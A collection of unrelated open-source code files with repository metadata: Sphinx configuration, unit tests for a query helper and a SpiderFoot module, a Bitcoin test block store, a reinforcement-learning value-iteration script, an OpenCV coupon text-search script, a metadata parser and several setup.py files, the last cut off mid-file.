# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Dolphindoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Dolphin.tex', u'Dolphin Documentation',
u'Jeremy Self', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'dolphin', u'Dolphin Documentation',
[u'Jeremy Self'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'Dolphin', u'Dolphin Documentation',
u'Jeremy Self', 'Dolphin', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| {
"content_hash": "2a325634c2e649b4986b464c8b2eeb6a",
"timestamp": "",
"source": "github",
"line_count": 229,
"max_line_length": 80,
"avg_line_length": 31.91703056768559,
"alnum_prop": 0.7009166780681352,
"repo_name": "coxmediagroup/dolphin",
"id": "5726c60dccd9cc0b27a51d4adcc8c7fa7f4acc0d",
"size": "7727",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "docs/source/conf.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "264"
},
{
"name": "Python",
"bytes": "84795"
},
{
"name": "Shell",
"bytes": "713"
}
],
"symlink_target": ""
} |
import unittest
from docido_sdk.toolbox.edsl import kwargsql
and_ = kwargsql.and_
or_ = kwargsql.or_
xor = kwargsql.xor
class TestKwargSQL(unittest.TestCase):
d = {
's': 's_value',
'i': 3,
'nested': {
'val': 'nested-value',
'another_key': 42,
},
'array': [4, 5, 6],
'exc': Exception("Error: a comprensive message")
}
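    # kwargsql keyword mini-syntax exercised by the tests below (summarized
    # from the assertions themselves): '__' walks nested dicts/attributes
    # (nested__val), indexes sequences (array__1), and may end in an
    # operation name such as __size, __not, __exists or __istartswith.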
def test_operations(self):
self.assertFalse(kwargsql.OPERATIONS['ne']('a', u'a'))
self.assertTrue(kwargsql.OPERATIONS['ne']('a', 42))
self.assertFalse(kwargsql.OPERATIONS['lt'](42, 42))
self.assertTrue(kwargsql.OPERATIONS['lt'](41, 42))
self.assertTrue(kwargsql.OPERATIONS['lte'](42, 42))
self.assertFalse(kwargsql.OPERATIONS['gt'](42, 42))
self.assertTrue(kwargsql.OPERATIONS['gt'](42, 41))
self.assertTrue(kwargsql.OPERATIONS['gte'](42, 42))
self.assertTrue(kwargsql.OPERATIONS['in'](1, [2, 3, 1, 4]))
self.assertTrue(kwargsql.OPERATIONS['nin'](0, [1, 2, 3]))
self.assertTrue(kwargsql.OPERATIONS['size']([1, 2, 3], 3))
self.assertTrue(kwargsql.OPERATIONS['iexact']('foo', u'Foo'))
self.assertTrue(kwargsql.OPERATIONS['contains']('abcde', 'bcd'))
self.assertTrue(kwargsql.OPERATIONS['icontains']('abcd', 'bCD'))
self.assertTrue(kwargsql.OPERATIONS['startswith']('abcd', 'abc'))
self.assertTrue(kwargsql.OPERATIONS['istartswith']('abcd', 'aBc'))
self.assertTrue(kwargsql.OPERATIONS['endswith']('abcd', 'bcd'))
self.assertTrue(kwargsql.OPERATIONS['iendswith']('abcd', 'BcD'))
self.assertTrue(kwargsql.OPERATIONS['isinstance']('abcd', basestring))
self.assertTrue(kwargsql.OPERATIONS['issubclass'](str, basestring))
def test_seqexp(self):
d = self.d
self.assertTrue(and_(d, s='s_value', i=3))
self.assertFalse(and_(d, s='s_value', i=1))
self.assertFalse(or_(d, s='not', i='not'))
self.assertTrue(or_(d, s='s_value', i='not'))
self.assertTrue(or_(d, s='not', i=3))
self.assertTrue(or_(d, s='s_value', foo_i=3))
self.assertTrue(xor(d, foo_i=42, s='s_value'))
self.assertFalse(xor(d, foo_i=42, s='unknown'))
def test_simple_op(self):
d = self.d
self.assertTrue(and_(d, nested__size=2))
def test_simple_trailing__(self):
self.assertTrue(and_(self.d, s__='s_value'))
def test_not(self):
d = self.d
self.assertFalse(and_(d, s__not='s_value'))
def test_nested(self):
d = self.d
self.assertTrue(and_(d, nested__val='nested-value'))
self.assertTrue(and_(d, exc__message__istartswith='error: '))
def test_arrays(self):
self.assertTrue(and_(self.d, array__1=5))
def test_invalid(self):
with self.assertRaises(Exception):
and_(self.d, __=42)
def test_exist_operation(self):
self.assertFalse(and_(self.d, nested__unknown__exists=1))
self.assertFalse(and_(self.d, exc__unknown__exists=1))
def test_get(self):
self.assertEqual(kwargsql.get(self.d, 'nested__val'), 'nested-value')
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "d2f801ad8195ff8acae65b5bfb6e8b02",
"timestamp": "",
"source": "github",
"line_count": 87,
"max_line_length": 78,
"avg_line_length": 36.9080459770115,
"alnum_prop": 0.5951417004048583,
"repo_name": "LilliJane/docido-python-sdk",
"id": "aa66097112aa37ec50222bfa74eca67f04251ba3",
"size": "3211",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_kwargsql.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "225"
},
{
"name": "Python",
"bytes": "152553"
}
],
"symlink_target": ""
} |
import pytest
import unittest
from modules.sfp_dnsgrep import sfp_dnsgrep
from sflib import SpiderFoot
@pytest.mark.usefixtures
class TestModuleDnsGrep(unittest.TestCase):
def test_opts(self):
module = sfp_dnsgrep()
self.assertEqual(len(module.opts), len(module.optdescs))
def test_setup(self):
sf = SpiderFoot(self.default_options)
module = sfp_dnsgrep()
module.setup(sf, dict())
def test_watchedEvents_should_return_list(self):
module = sfp_dnsgrep()
self.assertIsInstance(module.watchedEvents(), list)
def test_producedEvents_should_return_list(self):
module = sfp_dnsgrep()
self.assertIsInstance(module.producedEvents(), list)
| {
"content_hash": "fad0a5fffa61c8737cb53aa56143f3b9",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 64,
"avg_line_length": 27.923076923076923,
"alnum_prop": 0.6914600550964187,
"repo_name": "smicallef/spiderfoot",
"id": "69cfefaa5e03998fe1ae61cd9c6d9ea1c19de861",
"size": "726",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/unit/modules/test_sfp_dnsgrep.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "9833"
},
{
"name": "Dockerfile",
"bytes": "2779"
},
{
"name": "JavaScript",
"bytes": "34248"
},
{
"name": "Python",
"bytes": "2845553"
},
{
"name": "RobotFramework",
"bytes": "7584"
},
{
"name": "Shell",
"bytes": "1636"
}
],
"symlink_target": ""
} |
from .mininode import *
from io import BytesIO
import dbm.ndbm
import sys  # used by the exception reporting below
class BlockStore(object):
def __init__(self, datadir):
self.blockDB = dbm.ndbm.open(datadir + "/blocks", 'c')
self.currentBlock = 0
self.headers_map = dict()
def close(self):
self.blockDB.close()
def erase(self, blockhash):
del self.blockDB[repr(blockhash)]
# lookup an entry and return the item as raw bytes
def get(self, blockhash):
value = None
try:
value = self.blockDB[repr(blockhash)]
except KeyError:
return None
return value
# lookup an entry and return it as a CBlock
def get_block(self, blockhash):
ret = None
serialized_block = self.get(blockhash)
if serialized_block is not None:
f = BytesIO(serialized_block)
ret = CBlock()
ret.deserialize(f)
ret.calc_sha256()
return ret
def get_header(self, blockhash):
try:
return self.headers_map[blockhash]
except KeyError:
return None
# Note: this pulls full blocks out of the database just to retrieve
# the headers -- perhaps we could keep a separate data structure
# to avoid this overhead.
def headers_for(self, locator, hash_stop, current_tip=None):
if current_tip is None:
current_tip = self.currentBlock
current_block_header = self.get_header(current_tip)
if current_block_header is None:
return None
response = msg_headers()
headersList = [ current_block_header ]
maxheaders = 2000
while (headersList[0].sha256 not in locator.vHave):
prevBlockHash = headersList[0].hashPrevBlock
prevBlockHeader = self.get_header(prevBlockHash)
if prevBlockHeader is not None:
headersList.insert(0, prevBlockHeader)
else:
break
headersList = headersList[:maxheaders] # truncate if we have too many
hashList = [x.sha256 for x in headersList]
index = len(headersList)
if (hash_stop in hashList):
index = hashList.index(hash_stop)+1
response.headers = headersList[:index]
return response
def add_block(self, block):
block.calc_sha256()
try:
self.blockDB[repr(block.sha256)] = bytes(block.serialize())
except TypeError as e:
print("Unexpected error: ", sys.exc_info()[0], e.args)
self.currentBlock = block.sha256
self.headers_map[block.sha256] = CBlockHeader(block)
def add_header(self, header):
self.headers_map[header.sha256] = header
# lookup the hashes in "inv", and return p2p messages for delivering
# blocks found.
def get_blocks(self, inv):
responses = []
for i in inv:
if (i.type == 2): # MSG_BLOCK
data = self.get(i.hash)
if data is not None:
# Use msg_generic to avoid re-serialization
responses.append(msg_generic(b"block", data))
return responses
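    # get_locator builds a Bitcoin-style block locator: it walks back from
    # the tip, doubling the step after the first ~10 hashes, so vHave is
    # dense near the tip and exponentially sparse toward genesis.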
def get_locator(self, current_tip=None):
if current_tip is None:
current_tip = self.currentBlock
r = []
counter = 0
step = 1
lastBlock = self.get_block(current_tip)
while lastBlock is not None:
r.append(lastBlock.hashPrevBlock)
for i in range(step):
lastBlock = self.get_block(lastBlock.hashPrevBlock)
if lastBlock is None:
break
counter += 1
if counter > 10:
step *= 2
locator = CBlockLocator()
locator.vHave = r
return locator
class TxStore(object):
def __init__(self, datadir):
self.txDB = dbm.ndbm.open(datadir + "/transactions", 'c')
def close(self):
self.txDB.close()
# lookup an entry and return the item as raw bytes
def get(self, txhash):
value = None
try:
value = self.txDB[repr(txhash)]
except KeyError:
return None
return value
def get_transaction(self, txhash):
ret = None
serialized_tx = self.get(txhash)
if serialized_tx is not None:
f = BytesIO(serialized_tx)
ret = CTransaction()
ret.deserialize(f)
ret.calc_sha256()
return ret
def add_transaction(self, tx):
tx.calc_sha256()
try:
self.txDB[repr(tx.sha256)] = bytes(tx.serialize())
except TypeError as e:
print("Unexpected error: ", sys.exc_info()[0], e.args)
def get_transactions(self, inv):
responses = []
for i in inv:
if (i.type == 1): # MSG_TX
tx = self.get(i.hash)
if tx is not None:
responses.append(msg_generic(b"tx", tx))
return responses
| {
"content_hash": "688e6b752c53e001ac59cbc86900dcc6",
"timestamp": "",
"source": "github",
"line_count": 156,
"max_line_length": 77,
"avg_line_length": 33.05128205128205,
"alnum_prop": 0.548099301784329,
"repo_name": "realzzt/BitCoin2013",
"id": "e76016d79b14a984b7d258389be831bebe8806d3",
"size": "5580",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "qa/rpc-tests/test_framework/blockstore.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "29375"
},
{
"name": "C",
"bytes": "703206"
},
{
"name": "C++",
"bytes": "4667168"
},
{
"name": "CSS",
"bytes": "1216"
},
{
"name": "HTML",
"bytes": "51842"
},
{
"name": "Java",
"bytes": "33209"
},
{
"name": "M4",
"bytes": "189542"
},
{
"name": "Makefile",
"bytes": "102451"
},
{
"name": "Objective-C",
"bytes": "4081"
},
{
"name": "Objective-C++",
"bytes": "7465"
},
{
"name": "Protocol Buffer",
"bytes": "2376"
},
{
"name": "Python",
"bytes": "983598"
},
{
"name": "QMake",
"bytes": "4108"
},
{
"name": "Shell",
"bytes": "50752"
}
],
"symlink_target": ""
} |
from netCDF4.utils import *
from netCDF4.utils import _quantize, _StartCountStride, _out_array_shape
| {
"content_hash": "d2673836263876ec313ae2744e5d7c2b",
"timestamp": "",
"source": "github",
"line_count": 2,
"max_line_length": 72,
"avg_line_length": 50.5,
"alnum_prop": 0.801980198019802,
"repo_name": "mathause/netCDF4p",
"id": "1bc94c90ff3beb858c09dba7e80af99df72c19b7",
"size": "160",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "netCDF4p/utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "200806"
}
],
"symlink_target": ""
} |
import numpy as np
from grid_world import standard_grid, negative_grid
from iterative_policy_evaluation import print_values, print_policy
SMALL_ENOUGH = 1e-3
GAMMA = 0.9
ALL_POSSIBLE_ACTIONS = ('U', 'D', 'L', 'R')
# this is deterministic
# all p(s',r|s,a) = 1 or 0
if __name__ == '__main__':
# this grid gives you a reward of -0.1 for every non-terminal state
# we want to see if this will encourage finding a shorter path to the goal
grid = negative_grid()
# print rewards
print("rewards:")
print_values(grid.rewards, grid)
# state -> action
# we'll randomly choose an action and update as we learn
policy = {}
for s in grid.actions.keys():
policy[s] = np.random.choice(ALL_POSSIBLE_ACTIONS)
# initial policy
print("initial policy:")
print_policy(policy, grid)
# initialize V(s)
V = {}
states = grid.all_states()
for s in states:
# V[s] = 0
if s in grid.actions:
V[s] = np.random.random()
else:
# terminal state
V[s] = 0
# repeat until convergence
# V[s] = max[a]{ sum[s',r] { p(s',r|s,a)[r + gamma*V[s']] } }
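  # Worked illustration of one backup (hypothetical numbers): with
  # GAMMA = 0.9, if action 'R' from state s yields r = -0.1 and
  # V[s'] = 1.0, its candidate value is -0.1 + 0.9*1.0 = 0.8; V[s]
  # becomes the max of the four candidates for U, D, L and R.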
while True:
biggest_change = 0
for s in states:
old_v = V[s]
# V(s) only has value if it's not a terminal state
if s in policy:
new_v = float('-inf')
for a in ALL_POSSIBLE_ACTIONS:
grid.set_state(s)
r = grid.move(a)
v = r + GAMMA * V[grid.current_state()]
if v > new_v:
new_v = v
V[s] = new_v
biggest_change = max(biggest_change, np.abs(old_v - V[s]))
if biggest_change < SMALL_ENOUGH:
break
# find a policy that leads to optimal value function
for s in policy.keys():
best_a = None
best_value = float('-inf')
# loop through all possible actions to find the best current action
for a in ALL_POSSIBLE_ACTIONS:
grid.set_state(s)
r = grid.move(a)
v = r + GAMMA * V[grid.current_state()]
if v > best_value:
best_value = v
best_a = a
policy[s] = best_a
# our goal here is to verify that we get the same answer as with policy iteration
print("values:")
print_values(V, grid)
print("policy:")
print_policy(policy, grid)
| {
"content_hash": "a9f05cff23c655cdad562100f469c461",
"timestamp": "",
"source": "github",
"line_count": 82,
"max_line_length": 83,
"avg_line_length": 26.878048780487806,
"alnum_prop": 0.6011796733212341,
"repo_name": "balazssimon/ml-playground",
"id": "548824d5b9897eac00038376bfa98322ab7f4dd4",
"size": "2204",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "udemy/lazyprogrammer/reinforcement-learning-python/value_iteration.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "468040"
},
{
"name": "Python",
"bytes": "446476"
},
{
"name": "R",
"bytes": "60424"
}
],
"symlink_target": ""
} |
"""
USAGE:
text-search.py <string> <image>...
"""
from classifier import load_classifier
import cv2
import docopt
from features import hogdesc
import mserfeatures
import numpy as np
import ocr
from random import randint
from rectutils import find_words, next_on_same_line, on_consecutive_line, same_height
import searchcriteria
from searchcriteria import SearchCriteria
import templates
import time
import utils
def prepare_detect(img, rects):
vec = np.empty((len(rects), 24, 24), np.uint8)
for i in range(0,len(rects)):
x, y, w, h = rects[i]
roi = img[y:y+h,x:x+w]
roi = cv2.resize(roi, (24,24))
vec[i] = roi
return hogdesc(vec)
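# clip_coupon (below): binarize the image, keep the largest external
# contour, and crop to its bounding box -- i.e. isolate the coupon
# from the page background.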
def clip_coupon(img):
img_grey = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
ret, img_bin = cv2.threshold(img_grey ,127, 255, cv2.THRESH_BINARY)
imgc, contours, hierarchy = cv2.findContours(img_bin, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
contours_area = np.array([cv2.contourArea(c) for c in contours])
main_contour = np.array(contours)[np.where(contours_area == contours_area.max())][0]
x, y, w, h = cv2.boundingRect(main_contour)
return img[y:y+h,x:x+w]
if __name__ == '__main__':
arguments = docopt.docopt(__doc__)
classifier = load_classifier()
for i in arguments['<image>']:
words = []
for w in arguments['<string>'].split(' '):
sc = SearchCriteria.parse(w)
templates2d = templates.get_templates(sc.tokens)
words.append({'word': w, 'sc': sc, 'templates2d': templates2d, 'matches': []})
img = cv2.imread(i)
img = clip_coupon(img)
img_grey = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# sharpen image
blur = cv2.GaussianBlur(img_grey, (-1,-1), 3)
img_grey = cv2.addWeighted(img_grey, 1.5, blur, -0.5, 0)
# text region features
char_rects = mserfeatures.get_features(img_grey)
# filter aspect ratio
#non_char_rects = [r for r in char_rects if (1.0/5.0) > float(r[2])/float(r[3]) or float(r[2])/float(r[3]) > 5]
rect_word_rects = find_words(char_rects)
img_rects = mserfeatures.get_inverse_features_with_canny(img, char_rects)
#continue
# img1 = img.copy()
# utils.draw_rects(img1, char_rects)
# cv2.namedWindow('img rects', cv2.WINDOW_NORMAL)
# cv2.imshow('img rects', img1)
# cv2.waitKey()
# quit()
# label features
start = time.time()
print "Running classifier..."
vec = prepare_detect(img_grey, char_rects)
char_results = classifier.predict(vec)
char_results = char_results.reshape(-1)
print "took %fs" % (time.time() - start,)
for w in words:
sc = w['sc']
templates2d = w['templates2d']
matches = w['matches']
if sc.tokens == ['{','}']:
matches.extend(rect_word_rects)
continue
elif sc.tokens == ['\\','i']:
#matches.extend(np.array(char_rects)[char_results == 0])
matches.extend(img_rects)
continue
# word features
char_matches = np.in1d(char_results, list(sc.indexset()))
matching_char_rects = np.array(char_rects, int)[char_matches]
matching_char_results = char_results[char_matches]
word_rects = []
for result, rect in zip(matching_char_results, matching_char_rects):
key = searchcriteria.get_label_value(int(result)).lower()
for t in templates2d[key]:
word_rects.append(t.match2d(rect))
# filter within image
word_rects = [r for r in word_rects if not (r[0] < 0 or r[1] < 0 or r[2] > img.shape[1] or r[3] > img.shape[0])]
start = time.time()
print "Running OCR..."
for r in word_rects:
roi = img_grey[r[1]:r[1]+r[3],r[0]:r[0]+r[2]]
text = ocr.ocr(roi)
for m in templates.match(sc.tokens, text.lower()):
matches.append(r)
print "took %fs" % (time.time() - start,)
start = time.time()
print "Matching words and lines..."
line_matches = [[r] for r in words[0]['matches']]
for idx in range(1, len(words)):
tmp = []
second_word_matches = words[idx]['matches']
for lm in line_matches:
for r2 in second_word_matches:
r1 = lm[-1]
if same_height(r1, r2) and (next_on_same_line(r1, r2) or on_consecutive_line(r1, r2)):
tmp.append(list(lm) + [r2])
line_matches = tmp
print "took %fs" % (time.time() - start,)
for lm in line_matches:
color = (randint(0,255), randint(0,255), randint(0,255))
x, y, w, h = cv2.boundingRect(np.concatenate([utils.points(r) for r in lm]))
img = cv2.rectangle(img, (x,y), (x+w,y+h), color, 2)
# extract text of match
roi = img_grey[y:y+h,x:x+w]
text = ocr.ocr(roi)
print color, text
cv2.namedWindow('Matches ' + i, cv2.WINDOW_NORMAL)
cv2.imshow('Matches ' + i, img)
        cv2.waitKey()
| {
"content_hash": "83a7f2cdc71defd06ab45bc8947af236",
"timestamp": "",
"source": "github",
"line_count": 148,
"max_line_length": 124,
"avg_line_length": 35.777027027027025,
"alnum_prop": 0.5567516525023607,
"repo_name": "szakrewsky/text-search",
"id": "d7b96ee24d00e83adb11eed320571da0060d90bd",
"size": "5310",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "text-search.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "26678"
}
],
"symlink_target": ""
} |
from .link import Link
from .image import Image
class MessageContent(object):
"""MessageContent.
:param links:
:type links: list[~mailosaur.models.Link]
:param images:
:type images: list[~mailosaur.models.Image]
:param body:
:type body: str
"""
def __init__(self, data=None):
if data is None:
data = {}
self.links = [Link(i) for i in data.get('links', [])]
        images = data.get('images', None)
        if isinstance(images, list):
            self.images = [Image(i) for i in images]
        else:
            # ensure the attribute always exists, even when the payload
            # carries no image list
            self.images = []
self.body = data.get('body', None)
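    # Illustrative construction (hypothetical payload; the keys match the
    # accesses above):
    # content = MessageContent({'body': 'Hi', 'links': [], 'images': []})
    # content.body  # 'Hi'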
| {
"content_hash": "bcccae32ce76917175cca00cde0c6f87",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 61,
"avg_line_length": 24.08,
"alnum_prop": 0.5764119601328903,
"repo_name": "mailosaurapp/mailosaur-python",
"id": "f51a6cf50776ec771750292aed5df406594f8069",
"size": "602",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mailosaur/models/message_content.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "14151"
}
],
"symlink_target": ""
} |
import os
import sys
from setuptools import setup
from setuptools.command.test import test as TestCommand
py_version = sys.version_info[:2]
here = os.path.abspath(os.path.dirname(__file__))
try:
README = open(os.path.join(here, "README.rst")).read()
README += open(os.path.join(here, "HISTORY.rst")).read()
except IOError:
README = "http://ikame.github.com/Rockefeller"
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errno = pytest.main(self.test_args)
sys.exit(errno)
setup(name="Rockefeller",
version="1.2.2",
description="Money, currencies and exchange rates library.",
long_description=README,
author="ikame",
author_email="[email protected]",
url="http://anler.github.com/Rockefeller/",
license="MIT",
install_requires=["six"],
tests_require=["pytest", "mock"],
cmdclass={"test": PyTest},
keywords="money currency exchange rates",
classifiers=[
"Environment :: Plugins",
"Environment :: Console",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"Intended Audience :: Financial and Insurance Industry",
"Operating System :: OS Independent",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.3",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Office/Business :: Financial"])
| {
"content_hash": "f425b6d9428d30f74c895240dc35f6ab",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 73,
"avg_line_length": 32.44,
"alnum_prop": 0.6245376078914919,
"repo_name": "anler/Rockefeller",
"id": "0b6d14c167aa166cc0e4295baa3af909613be021",
"size": "1622",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "243615"
}
],
"symlink_target": ""
} |
import time
#import urllib2
#import requests
import subprocess
import os
import re
#import cookielib, urllib2
class MetadataError(ValueError):
pass
class MetadataRecord:
def __init__(self, ID, params):
self.ID = ID
self.lg = params[0]
self.dialect = params[1]
self.speakers = params[2].split(';')
self.sources = params[3].split(';')
self.recordingname = params[4]
try:
self.recordingdate = time.strftime("%Y-%m-%e",time.strptime(params[5].strip(),"%d-%b-%y"))+"T12:00:00Z/DAY"#choosing noon for unknown time
except ValueError:
#self.recordingdate = time.strftime("%Y-%m-%e",time.strptime("01-Jan-70","%d-%b-%y"))+"T12:00:00Z/DAY"
self.recordingdate = False
self.recordinglinguists = params[6].split(';')
self.anlalink = params[7]
        self.editedbyspeaker = False
        # Compare against lower-case 'y'; testing .lower() against 'Y' was always False.
        if params[8].lower() == 'y':
            self.editedbyspeaker = True
        self.editedbylinguist = False
        if params[9].lower() == 'y':
            self.editedbylinguist = True
        self.texttypes = params[10].split(';')
        self.rejectedbyspeaker = False
        if params[11].lower() == 'y':
            self.rejectedbyspeaker = True
def toSOLRstring(self):
singlevalues = """<field name="aagdID">{ID}</field>
<field name="lg">{lg}</field>
<field name="dialect">{dialect}</field>
<field name="recordingname">{recordingname}</field>
<field name="anlalink">{anlalink}</field>
<field name="editedbyspeaker">{editedbyspeaker}</field>
<field name="editedbylinguist">{editedbylinguist}</field>
<field name="rejectedbyspeaker">{rejectedbyspeaker}</field>""".format(**self.__dict__)
if self.recordingdate:
singlevalues += """\n<field name="recordingdate">%s</field>"""%self.recordingdate
speakers = '\n'.join(['<field name="speaker">%s</field>'%spkr for spkr in self.speakers])
sources = '\n'.join(['<field name="source">%s</field>'%src for src in self.sources])
recordinglinguists = '\n'.join(['<field name="recordinglinguist">%s</field>'%rl for rl in self.recordinglinguists])
texttypes = '\n'.join(['<field name="texttype">%s</field>'%tt for tt in self.texttypes])
s = ''.join((singlevalues,speakers,sources,recordinglinguists,texttypes))
return s
class Metadata:
def __init__(self,csvfile,url):
self.chunks = {}
        if csvfile is not None:
            lines = open(csvfile).readlines()[1:]  # drop first line where the labels are
else:
#syscall = "wget %s" % url #urllib2 has problems with cookies
#print syscall
subprocess.call(["wget", "-O" "/tmp/metadatafile", url])
#cj = cookielib.CookieJar()
#opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
#urllib2.install_opener(opener)
#f = urllib2.urlopen(url)
f = open('/tmp/metadatafile')
#lines=f.readlines()
lines=re.split('[\r\n]',f.read())
#os.remove("metadatafile")
print len(lines)
for line in lines:
fields = line.split('\t')
ID = fields[0]
self.chunks[ID] = MetadataRecord(ID,fields[1:])
class Language:
def __init__(self,name,iso,coords):
self.name=name
self.iso=iso
self.coords=coords
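# Usage sketch (assumes a tab-separated export whose first row is a header and
# whose data rows carry an ID column followed by the 12 fields that
# MetadataRecord reads; the file path is hypothetical):
#
#     md = Metadata('/tmp/export.tsv', None)
#     for ID, record in md.chunks.iteritems():
#         print record.toSOLRstring()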
| {
"content_hash": "dce7706df3f8263456b4aaf2eedc551e",
"timestamp": "",
"source": "github",
"line_count": 89,
"max_line_length": 143,
"avg_line_length": 35.2247191011236,
"alnum_prop": 0.6478468899521531,
"repo_name": "Glottotopia/aagd",
"id": "33d7ce4a1123e67813ffd8e6a8351ca591bf3850",
"size": "3135",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "importscripts/athahelpers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "ASP",
"bytes": "152885"
},
{
"name": "CSS",
"bytes": "454208"
},
{
"name": "ColdFusion",
"bytes": "438820"
},
{
"name": "HTML",
"bytes": "1998354"
},
{
"name": "Java",
"bytes": "510468"
},
{
"name": "JavaScript",
"bytes": "6505329"
},
{
"name": "Lasso",
"bytes": "72399"
},
{
"name": "Makefile",
"bytes": "10216"
},
{
"name": "PHP",
"bytes": "259528"
},
{
"name": "Perl",
"bytes": "137186"
},
{
"name": "Python",
"bytes": "13713475"
},
{
"name": "Shell",
"bytes": "346"
},
{
"name": "XSLT",
"bytes": "15970"
}
],
"symlink_target": ""
} |
from distutils.core import setup
from Cython.Distutils import build_ext
from Cython.Distutils.extension import Extension
classifiers = """
Development Status :: 4 - Beta
Intended Audience :: Developers
Operating System :: OS Independent
Programming Language :: Python :: 2
Programming Language :: Python :: 3
Topic :: Software Development :: Libraries
Topic :: Database
"""
with open('README.rst') as f:
long_description = f.read()
setup(
name='python-luxio',
version='0.0.4',
license='New BSD',
description='Python extension for Lux IO',
author='Takashi Matsuno',
author_email='[email protected]',
url='https://github.com/gonsuke/python-luxio',
long_description=long_description,
packages = ['luxio'],
ext_modules=[
Extension(
"luxio._luxio",
